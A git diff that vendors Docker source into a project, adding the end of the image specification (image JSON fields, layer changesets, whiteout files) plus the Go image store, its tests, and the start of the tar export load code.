+    <dt>
+        parent <code>string</code>
+    </dt>
+    <dd>
+        ID of the parent image. If there is no parent image then this field
+        should be omitted. A collection of images may share many of the same
+        ancestor layers. This organizational structure is strictly a tree with
+        any one layer having either no parent or a single parent and zero or
+        more descendant layers. Cycles are not allowed and implementations
+        should be careful to avoid creating them or iterating through a cycle
+        indefinitely.
+    </dd>
+    <dt>
+        created <code>string</code>
+    </dt>
+    <dd>
+        ISO-8601 formatted combined date and time at which the image was
+        created.
+    </dd>
+    <dt>
+        author <code>string</code>
+    </dt>
+    <dd>
+        Gives the name and/or email address of the person or entity which
+        created and is responsible for maintaining the image.
+    </dd>
+    <dt>
+        architecture <code>string</code>
+    </dt>
+    <dd>
+        The CPU architecture which the binaries in this image are built to run
+        on. Possible values include:
+        <ul>
+            <li>386</li>
+            <li>amd64</li>
+            <li>arm</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        os <code>string</code>
+    </dt>
+    <dd>
+        The name of the operating system which the image is built to run on.
+        Possible values include:
+        <ul>
+            <li>darwin</li>
+            <li>freebsd</li>
+            <li>linux</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        checksum <code>string</code>
+    </dt>
+    <dd>
+        Image Checksum of the filesystem changeset associated with the image
+        layer.
+    </dd>
+    <dt>
+        Size <code>integer</code>
+    </dt>
+    <dd>
+        The size in bytes of the filesystem changeset associated with the image
+        layer.
+    </dd>
+    <dt>
+        config <code>struct</code>
+    </dt>
+    <dd>
+        The execution parameters which should be used as a base when running a
+        container using the image. This field can be <code>null</code>, in
+        which case any execution parameters should be specified at creation of
+        the container.
+
+        <h4>Container RunConfig Field Descriptions</h4>
+
+        <dl>
+            <dt>
+                User <code>string</code>
+            </dt>
+            <dd>
+                <p>The username or UID which the process in the container should
+                run as. This acts as a default value to use when the value is
+                not specified when creating a container.</p>
+
+                <p>All of the following are valid:</p>
+
+                <ul>
+                    <li><code>user</code></li>
+                    <li><code>uid</code></li>
+                    <li><code>user:group</code></li>
+                    <li><code>uid:gid</code></li>
+                    <li><code>uid:group</code></li>
+                    <li><code>user:gid</code></li>
+                </ul>
+
+                <p>If <code>group</code>/<code>gid</code> is not specified, the
+                default group and supplementary groups of the given
+                <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
+                from the container are applied.</p>
+            </dd>
+            <dt>
+                Memory <code>integer</code>
+            </dt>
+            <dd>
+                Memory limit (in bytes). This acts as a default value to use
+                when the value is not specified when creating a container.
+            </dd>
+            <dt>
+                MemorySwap <code>integer</code>
+            </dt>
+            <dd>
+                Total memory usage (memory + swap); set to <code>-1</code> to
+                disable swap. This acts as a default value to use when the
+                value is not specified when creating a container.
+            </dd>
+            <dt>
+                CpuShares <code>integer</code>
+            </dt>
+            <dd>
+                CPU shares (relative weight vs. other containers). This acts as
+                a default value to use when the value is not specified when
+                creating a container.
+            </dd>
+            <dt>
+                ExposedPorts <code>struct</code>
+            </dt>
+            <dd>
+                A set of ports to expose from a container running this image.
+                This JSON structure value is unusual because it is a direct
+                JSON serialization of the Go type
+                <code>map[string]struct{}</code> and is represented in JSON as
+                an object mapping its keys to an empty object. Here is an
+                example:
+
+<pre>{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}</pre>
+
+                Its keys can be in the format of:
+                <ul>
+                    <li>
+                        <code>"port/tcp"</code>
+                    </li>
+                    <li>
+                        <code>"port/udp"</code>
+                    </li>
+                    <li>
+                        <code>"port"</code>
+                    </li>
+                </ul>
+                with the default protocol being <code>"tcp"</code> if not
+                specified.
+
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Env <code>array of strings</code>
+            </dt>
+            <dd>
+                Entries are in the format of <code>VARNAME="var value"</code>.
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Entrypoint <code>array of strings</code>
+            </dt>
+            <dd>
+                A list of arguments to use as the command to execute when the
+                container starts. This value acts as a  default and is replaced
+                by an entrypoint specified when creating a container.
+            </dd>
+            <dt>
+                Cmd <code>array of strings</code>
+            </dt>
+            <dd>
+                Default arguments to the entry point of the container. These
+                values act as defaults and are replaced with any specified when
+                creating a container. If an <code>Entrypoint</code> value is
+                not specified, then the first entry of the <code>Cmd</code>
+                array should be interpreted as the executable to run.
+            </dd>
+            <dt>
+                Volumes <code>struct</code>
+            </dt>
+            <dd>
+                A set of directories which should be created as data volumes in
+                a container running this image. This JSON structure value is
+                unusual because it is a direct JSON serialization of the Go
+                type <code>map[string]struct{}</code> and is represented in
+                JSON as an object mapping its keys to an empty object. Here is
+                an example:
+<pre>{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}</pre>
+            </dd>
+            <dt>
+                WorkingDir <code>string</code>
+            </dt>
+            <dd>
+                Sets the current working directory of the entry point process
+                in the container. This value acts as a default and is replaced
+                by a working directory specified when creating a container.
+            </dd>
+        </dl>
+    </dd>
+</dl>
+
+Any extra fields in the Image JSON struct are considered implementation
+specific and should be ignored by any implementations which are unable to
+interpret them.
+
+## Creating an Image Filesystem Changeset
+
+An example of creating an Image Filesystem Changeset follows.
+
+An image root filesystem is first created as an empty directory named with the
+ID of the image being created. Here is the initial empty directory structure
+for the changeset for an image with ID `c3167915dc9d` ([real IDs are much
+longer](#id_desc), but this example use a truncated one here for brevity.
+Implementations need not name the rootfs directory in this way but it may be
+convenient for keeping record of a large number of image layers.):
+
+```
+c3167915dc9d/
+```
+
+Files and directories are then created:
+
+```
+c3167915dc9d/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+The `c3167915dc9d` directory is then committed as a plain Tar archive with
+entries for the following files:
+
+```
+etc/my-app-config
+bin/my-app-binary
+bin/my-app-tools
+```
+
+The TarSum checksum for the archive file is then computed and placed in the
+JSON metadata along with the execution parameters.
+
+To make changes to the filesystem of this container image, create a new
+directory named with a new ID, such as `f60c56784b83`, and initialize it with
+a snapshot of the parent image's root filesystem, so that the directory is
+identical to that of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem
+can make this very efficient:
+
+```
+f60c56784b83/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This example change is going add a configuration directory at `/etc/my-app.d`
+which contains a default config file. There's also a change to the
+`my-app-tools` binary to handle the config layout change. The `f60c56784b83`
+directory then looks like this:
+
+```
+f60c56784b83/
+    etc/
+        my-app.d/
+            default.cfg
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This reflects the removal of `/etc/my-app-config` and creation of a file and
+directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been
+replaced with an updated version. Before committing this directory to a
+changeset, because it has a parent image, it is first compared with the
+directory tree of the parent snapshot, `f60c56784b83`, looking for files and
+directories that have been added, modified, or removed. The following changeset
+is found:
+
+```
+Added:      /etc/my-app.d/default.cfg
+Modified:   /bin/my-app-tools
+Deleted:    /etc/my-app-config
+```
+
+A Tar Archive is then created which contains *only* this changeset: The added
+and modified files and directories in their entirety, and for each deleted item
+an entry for an empty file at the same location but with the basename of the
+deleted file or directory prefixed with `.wh.`. The filenames prefixed with
+`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible
+to create an image root filesystem which contains a file or directory with a
+name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has
+the following entries:
+
+```
+/etc/my-app.d/default.cfg
+/bin/my-app-tools
+/etc/.wh.my-app-config
+```
+
+Any given image is likely to be composed of several of these Image Filesystem
+Changeset tar archives.
+
+## Combined Image JSON + Filesystem Changeset Format
+
+There is also a format for a single archive which contains complete information
+about an image, including:
+
+ - repository names/tags
+ - all image layer JSON files
+ - all tar archives of each layer filesystem changesets
+
+For example, here's what the full archive of `library/busybox` is (displayed in
+`tree` format):
+
+```
+.
+├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+└── repositories
+```
+
+There are one or more directories named with the ID for each layer in a full
+image. Each of these directories contains 3 files:
+
+ * `VERSION` - The schema version of the `json` file
+ * `json` - The JSON metadata for an image layer
+ * `layer.tar` - The Tar archive of the filesystem changeset for an image
+   layer.
+
+The content of the `VERSION` files is simply the semantic version of the JSON
+metadata schema:
+
+```
+1.0
+```
+
+And the `repositories` file is another JSON file which describes names/tags:
+
+```
+{  
+    "busybox":{  
+        "latest":"5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e"
+    }
+}
+```
+
+Every key in this object is the name of a repository, and maps to a collection
+of tag suffixes. Each tag maps to the ID of the image represented by that tag.
+
+## Loading an Image Filesystem Changeset
+
+Unpacking a bundle of image layer JSON files and their corresponding filesystem
+changesets can be done using a series of steps:
+
+1. Follow the parent IDs of image layers to find the root ancestor (an image
+with no parent ID specified).
+2. For every image layer, in order from root ancestor and descending down,
+extract the contents of that layer's filesystem changeset archive into a
+directory which will be used as the root of a container filesystem.
+
+    - Extract all contents of each archive.
+    - Walk the directory tree once more, removing any files with the prefix
+    `.wh.` and the corresponding file or directory named without this prefix.
+
+
+## Implementations
+
+This specification is an admittedly imperfect description of an
+imperfectly-understood problem. The Docker project is, in turn, an attempt to
+implement this specification. Our goal and our execution toward it will evolve
+over time, but our primary concern in this specification and in our
+implementation is compatibility and interoperability.
diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go
new file mode 100644
index 0000000000..b61c456097
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/store.go
@@ -0,0 +1,295 @@
+package image
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/layer"
+)
+
+// Store is an interface for creating and accessing images
+type Store interface {
+	Create(config []byte) (ID, error)
+	Get(id ID) (*Image, error)
+	Delete(id ID) ([]layer.Metadata, error)
+	Search(partialID string) (ID, error)
+	SetParent(id ID, parent ID) error
+	GetParent(id ID) (ID, error)
+	Children(id ID) []ID
+	Map() map[ID]*Image
+	Heads() map[ID]*Image
+}
+
+// LayerGetReleaser is a minimal interface for getting and releasing images.
+type LayerGetReleaser interface {
+	Get(layer.ChainID) (layer.Layer, error)
+	Release(layer.Layer) ([]layer.Metadata, error)
+}
+
+type imageMeta struct {
+	layer    layer.Layer
+	children map[ID]struct{}
+}
+
+type store struct {
+	sync.Mutex
+	ls        LayerGetReleaser
+	images    map[ID]*imageMeta
+	fs        StoreBackend
+	digestSet *digest.Set
+}
+
+// NewImageStore returns new store object for given layer store
+func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) {
+	is := &store{
+		ls:        ls,
+		images:    make(map[ID]*imageMeta),
+		fs:        fs,
+		digestSet: digest.NewSet(),
+	}
+
+	// load all current images and retain layers
+	if err := is.restore(); err != nil {
+		return nil, err
+	}
+
+	return is, nil
+}
+
+func (is *store) restore() error {
+	err := is.fs.Walk(func(dgst digest.Digest) error {
+		img, err := is.Get(IDFromDigest(dgst))
+		if err != nil {
+			logrus.Errorf("invalid image %v, %v", dgst, err)
+			return nil
+		}
+		var l layer.Layer
+		if chainID := img.RootFS.ChainID(); chainID != "" {
+			l, err = is.ls.Get(chainID)
+			if err != nil {
+				return err
+			}
+		}
+		if err := is.digestSet.Add(dgst); err != nil {
+			return err
+		}
+
+		imageMeta := &imageMeta{
+			layer:    l,
+			children: make(map[ID]struct{}),
+		}
+
+		is.images[IDFromDigest(dgst)] = imageMeta
+
+		return nil
+	})
+	if err != nil {
+		return err
+	}
+
+	// Second pass to fill in children maps
+	for id := range is.images {
+		if parent, err := is.GetParent(id); err == nil {
+			if parentMeta := is.images[parent]; parentMeta != nil {
+				parentMeta.children[id] = struct{}{}
+			}
+		}
+	}
+
+	return nil
+}
+
+func (is *store) Create(config []byte) (ID, error) {
+	var img Image
+	err := json.Unmarshal(config, &img)
+	if err != nil {
+		return "", err
+	}
+
+	// Must reject any config that references diffIDs from the history
+	// which aren't among the rootfs layers.
+	rootFSLayers := make(map[layer.DiffID]struct{})
+	for _, diffID := range img.RootFS.DiffIDs {
+		rootFSLayers[diffID] = struct{}{}
+	}
+
+	layerCounter := 0
+	for _, h := range img.History {
+		if !h.EmptyLayer {
+			layerCounter++
+		}
+	}
+	if layerCounter > len(img.RootFS.DiffIDs) {
+		return "", errors.New("too many non-empty layers in History section")
+	}
+
+	dgst, err := is.fs.Set(config)
+	if err != nil {
+		return "", err
+	}
+	imageID := IDFromDigest(dgst)
+
+	is.Lock()
+	defer is.Unlock()
+
+	if _, exists := is.images[imageID]; exists {
+		return imageID, nil
+	}
+
+	layerID := img.RootFS.ChainID()
+
+	var l layer.Layer
+	if layerID != "" {
+		l, err = is.ls.Get(layerID)
+		if err != nil {
+			return "", err
+		}
+	}
+
+	imageMeta := &imageMeta{
+		layer:    l,
+		children: make(map[ID]struct{}),
+	}
+
+	is.images[imageID] = imageMeta
+	if err := is.digestSet.Add(imageID.Digest()); err != nil {
+		delete(is.images, imageID)
+		return "", err
+	}
+
+	return imageID, nil
+}
+
+func (is *store) Search(term string) (ID, error) {
+	is.Lock()
+	defer is.Unlock()
+
+	dgst, err := is.digestSet.Lookup(term)
+	if err != nil {
+		if err == digest.ErrDigestNotFound {
+			err = fmt.Errorf("No such image: %s", term)
+		}
+		return "", err
+	}
+	return IDFromDigest(dgst), nil
+}
+
+func (is *store) Get(id ID) (*Image, error) {
+	// todo: Check if image is in images
+	// todo: Detect manual insertions and start using them
+	config, err := is.fs.Get(id.Digest())
+	if err != nil {
+		return nil, err
+	}
+
+	img, err := NewFromJSON(config)
+	if err != nil {
+		return nil, err
+	}
+	img.computedID = id
+
+	img.Parent, err = is.GetParent(id)
+	if err != nil {
+		img.Parent = ""
+	}
+
+	return img, nil
+}
+
+func (is *store) Delete(id ID) ([]layer.Metadata, error) {
+	is.Lock()
+	defer is.Unlock()
+
+	imageMeta := is.images[id]
+	if imageMeta == nil {
+		return nil, fmt.Errorf("unrecognized image ID %s", id.String())
+	}
+	for id := range imageMeta.children {
+		is.fs.DeleteMetadata(id.Digest(), "parent")
+	}
+	if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil {
+		delete(is.images[parent].children, id)
+	}
+
+	if err := is.digestSet.Remove(id.Digest()); err != nil {
+		logrus.Errorf("error removing %s from digest set: %q", id, err)
+	}
+	delete(is.images, id)
+	is.fs.Delete(id.Digest())
+
+	if imageMeta.layer != nil {
+		return is.ls.Release(imageMeta.layer)
+	}
+	return nil, nil
+}
+
+func (is *store) SetParent(id, parent ID) error {
+	is.Lock()
+	defer is.Unlock()
+	parentMeta := is.images[parent]
+	if parentMeta == nil {
+		return fmt.Errorf("unknown parent image ID %s", parent.String())
+	}
+	if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil {
+		delete(is.images[parent].children, id)
+	}
+	parentMeta.children[id] = struct{}{}
+	return is.fs.SetMetadata(id.Digest(), "parent", []byte(parent))
+}
+
+func (is *store) GetParent(id ID) (ID, error) {
+	d, err := is.fs.GetMetadata(id.Digest(), "parent")
+	if err != nil {
+		return "", err
+	}
+	return ID(d), nil // todo: validate?
+}
+
+func (is *store) Children(id ID) []ID {
+	is.Lock()
+	defer is.Unlock()
+
+	return is.children(id)
+}
+
+func (is *store) children(id ID) []ID {
+	var ids []ID
+	if is.images[id] != nil {
+		for id := range is.images[id].children {
+			ids = append(ids, id)
+		}
+	}
+	return ids
+}
+
+func (is *store) Heads() map[ID]*Image {
+	return is.imagesMap(false)
+}
+
+func (is *store) Map() map[ID]*Image {
+	return is.imagesMap(true)
+}
+
+func (is *store) imagesMap(all bool) map[ID]*Image {
+	is.Lock()
+	defer is.Unlock()
+
+	images := make(map[ID]*Image)
+
+	for id := range is.images {
+		if !all && len(is.children(id)) > 0 {
+			continue
+		}
+		img, err := is.Get(id)
+		if err != nil {
+			logrus.Errorf("invalid image access: %q, error: %q", id, err)
+			continue
+		}
+		images[id] = img
+	}
+	return images
+}
diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go
new file mode 100644
index 0000000000..50f8aa8b84
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/store_test.go
@@ -0,0 +1,300 @@
+package image
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/layer"
+)
+
+func TestRestore(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id1, err := fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = fs.Set([]byte(`invalid`))
+	if err != nil {
+		t.Fatal(err)
+	}
+	id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+	err = fs.SetMetadata(id2, "parent", []byte(id1))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	imgs := is.Map()
+	if actual, expected := len(imgs), 2; actual != expected {
+		t.Fatalf("invalid images length, expected 2, got %q", len(imgs))
+	}
+
+	img1, err := is.Get(ID(id1))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := img1.computedID, ID(id1); actual != expected {
+		t.Fatalf("invalid image ID: expected %q, got %q", expected, actual)
+	}
+
+	if actual, expected := img1.computedID.String(), string(id1); actual != expected {
+		t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual)
+	}
+
+	img2, err := is.Get(ID(id2))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := img1.Comment, "abc"; actual != expected {
+		t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual)
+	}
+
+	if actual, expected := img2.Comment, "def"; actual != expected {
+		t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual)
+	}
+
+	p, err := is.GetParent(ID(id1))
+	if err == nil {
+		t.Fatal("expected error for getting parent")
+	}
+
+	p, err = is.GetParent(ID(id2))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual, expected := p, ID(id1); actual != expected {
+		t.Fatalf("invalid parent: expected %q, got %q", expected, actual)
+	}
+
+	children := is.Children(ID(id1))
+	if len(children) != 1 {
+		t.Fatalf("invalid children length: %q", len(children))
+	}
+	if actual, expected := children[0], ID(id2); actual != expected {
+		t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual)
+	}
+
+	heads := is.Heads()
+	if actual, expected := len(heads), 1; actual != expected {
+		t.Fatalf("invalid images length: expected %q, got %q", expected, actual)
+	}
+
+	sid1, err := is.Search(string(id1)[:10])
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual, expected := sid1, ID(id1); actual != expected {
+		t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual)
+	}
+
+	sid1, err = is.Search(digest.Digest(id1).Hex()[:6])
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual, expected := sid1, ID(id1); actual != expected {
+		t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual)
+	}
+
+	invalidPattern := digest.Digest(id1).Hex()[1:6]
+	_, err = is.Search(invalidPattern)
+	if err == nil {
+		t.Fatalf("expected search for %q to fail", invalidPattern)
+	}
+
+}
+
+func TestAddDelete(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected {
+		t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual)
+	}
+
+	img, err := is.Get(id1)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := img.Comment, "abc"; actual != expected {
+		t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual)
+	}
+
+	id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = is.SetParent(id2, id1)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	pid1, err := is.GetParent(id2)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if actual, expected := pid1, id1; actual != expected {
+		t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual)
+	}
+
+	_, err = is.Delete(id1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = is.Get(id1)
+	if err == nil {
+		t.Fatalf("expected get for deleted image %q to fail", id1)
+	}
+	_, err = is.Get(id2)
+	if err != nil {
+		t.Fatal(err)
+	}
+	pid1, err = is.GetParent(id2)
+	if err == nil {
+		t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1)
+	}
+
+}
+
+func TestSearchAfterDelete(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id1, err := is.Search(string(id)[:15])
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := id1, id; expected != actual {
+		t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual)
+	}
+
+	if _, err := is.Delete(id); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := is.Search(string(id)[:15]); err == nil {
+		t.Fatal("expected search after deletion to fail")
+	}
+}
+
+func TestParentReset(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "images-fs-store")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+	fs, err := NewFSStoreBackend(tmpdir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := NewImageStore(fs, &mockLayerGetReleaser{})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id2, err := is.Create([]byte(`{"comment": "abc2", "rootfs": {"type": "layers"}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := is.SetParent(id, id2); err != nil {
+		t.Fatal(err)
+	}
+
+	ids := is.Children(id2)
+	if actual, expected := len(ids), 1; expected != actual {
+		t.Fatalf("wrong number of children: %d, got %d", expected, actual)
+	}
+
+	if err := is.SetParent(id, id3); err != nil {
+		t.Fatal(err)
+	}
+
+	ids = is.Children(id2)
+	if actual, expected := len(ids), 0; expected != actual {
+		t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual)
+	}
+
+	ids = is.Children(id3)
+	if actual, expected := len(ids), 1; expected != actual {
+		t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual)
+	}
+
+}
+
+type mockLayerGetReleaser struct{}
+
+func (ls *mockLayerGetReleaser) Get(layer.ChainID) (layer.Layer, error) {
+	return nil, nil
+}
+
+func (ls *mockLayerGetReleaser) Release(layer.Layer) ([]layer.Metadata, error) {
+	return nil, nil
+}
diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go
new file mode 100644
index 0000000000..01edd91fb7
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/tarexport/load.go
@@ -0,0 +1,390 @@
+package tarexport
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/reference"
+)
+
+func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error {
+	var (
+		sf             = streamformatter.NewJSONStreamFormatter()
+		progressOutput progress.Output
+	)
+	if !quiet {
+		progressOutput = sf.NewProgressOutput(outStream, false)
+	}
+	outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()}
+
+	tmpDir, err := ioutil.TempDir("", "docker-import-")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(tmpDir)
+
+	if err := chrootarchive.Untar(inTar, tmpDir, nil); err != nil {
+		return err
+	}
+	// read manifest, if no file then load in legacy mode
+	manifestPath, err := safePath(tmpDir, manifestFileName)
+	if err != nil {
+		return err
+	}
+	manifestFile, err := os.Open(manifestPath)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return l.legacyLoad(tmpDir, outStream, progressOutput)
+		}
+		return err
+	}
+	defer manifestFile.Close()
+
+	var manifest []manifestItem
+	if err := json.NewDecoder(manifestFile).Decode(&manifest); err != nil {
+		return err
+	}
+
+	var parentLinks []parentLink
+	var imageIDsStr string
+	var imageRefCount int
+
+	for _, m := range manifest {
+		configPath, err := safePath(tmpDir, m.Config)
+		if err != nil {
+			return err
+		}
+		config, err := ioutil.ReadFile(configPath)
+		if err != nil {
+			return err
+		}
+		img, err := image.NewFromJSON(config)
+		if err != nil {
+			return err
+		}
+		var rootFS image.RootFS
+		rootFS = *img.RootFS
+		rootFS.DiffIDs = nil
+
+		if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual {
+			return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual)
+		}
+
+		for i, diffID := range img.RootFS.DiffIDs {
+			layerPath, err := safePath(tmpDir, m.Layers[i])
+			if err != nil {
+				return err
+			}
+			r := rootFS
+			r.Append(diffID)
+			newLayer, err := l.ls.Get(r.ChainID())
+			if err != nil {
+				newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput)
+				if err != nil {
+					return err
+				}
+			}
+			defer layer.ReleaseAndLog(l.ls, newLayer)
+			if expected, actual := diffID, newLayer.DiffID(); expected != actual {
+				return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual)
+			}
+			rootFS.Append(diffID)
+		}
+
+		imgID, err := l.is.Create(config)
+		if err != nil {
+			return err
+		}
+		imageIDsStr += fmt.Sprintf("Loaded image ID: %s\n", imgID)
+
+		imageRefCount = 0
+		for _, repoTag := range m.RepoTags {
+			named, err := reference.ParseNamed(repoTag)
+			if err != nil {
+				return err
+			}
+			ref, ok := named.(reference.NamedTagged)
+			if !ok {
+				return fmt.Errorf("invalid tag %q", repoTag)
+			}
+			l.setLoadedTag(ref, imgID.Digest(), outStream)
+			outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref)))
+			imageRefCount++
+		}
+
+		parentLinks = append(parentLinks, parentLink{imgID, m.Parent})
+		l.loggerImgEvent.LogImageEvent(imgID.String(), imgID.String(), "load")
+	}
+
+	for _, p := range validatedParentLinks(parentLinks) {
+		if p.parentID != "" {
+			if err := l.setParentID(p.id, p.parentID); err != nil {
+				return err
+			}
+		}
+	}
+
+	if imageRefCount == 0 {
+		outStream.Write([]byte(imageIDsStr))
+	}
+
+	return nil
+}
+
+func (l *tarexporter) setParentID(id, parentID image.ID) error {
+	img, err := l.is.Get(id)
+	if err != nil {
+		return err
+	}
+	parent, err := l.is.Get(parentID)
+	if err != nil {
+		return err
+	}
+	if !checkValidParent(img, parent) {
+		return fmt.Errorf("image %v is not a valid parent for %v", parent.ID(), img.ID())
+	}
+	return l.is.SetParent(id, parentID)
+}
+
